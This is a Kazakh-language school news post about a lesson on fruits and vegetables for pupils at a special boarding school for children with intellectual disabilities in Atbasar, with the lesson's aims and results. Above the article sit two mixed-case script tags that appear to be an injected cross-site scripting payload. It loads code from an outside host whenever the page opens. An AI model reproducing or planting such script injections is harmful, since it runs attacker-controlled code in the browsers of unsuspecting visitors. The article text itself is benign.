<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.10.2017

Күз - береке, байлықтың бастауы...

2017 жылдың 24 қазан күні «Атбасар қаласындағы ақыл-ойы және психикалық дамуы кем балаларға

арналған № 2 облыстық арнайы түзету мектеп интернаты» мемлекеттік мекемесінде

мектепалды даярлық сынып оқушыларымен қазақ тілі пәнінен  «Жемістер мен көкөністер» тақырыбы бойынша

дәстүрлі емес сабақ түрі өткізілді. Аталған  сабақтың мақсаты:

Білімділік: Балаларға жемістер мен көкөністер туралы түсінік беру. Жемістер мен көкөністердің адам денсаулығына

пайдасы жайлы түсіндіру.

Жемістер мен көкөністердің атауларын дұрыс атап, оларды дұрыс ажырата білуге үйрету. 

Дамытушылық: Оқушылардың қисынды ойлау қабілетін арттыру. Есте сақтау қабілетін дамыту, дүние танымын

кеңейту. Жаңа сөздерді меңгерту арқылы сөздік қорын молайту.

Тәрбиелік: Балалардың жеміс ағаштарын қорғап, оларға қамқор болуға ықпал ету, еңбекке баулу.

Сабақта оқушылар  жаңа сөздерді меңгерді, жемістер мен көкөністерді бір-бірінен дұрыс ажырата білді. Олардың құрамы дәрумендерге бай, сондықтан адам денсаулығына пайдалы екендігіне көздері жеткізілді.  

Просмотров: 477


Пікір қосу



Деректерді қолтаңбаға қосу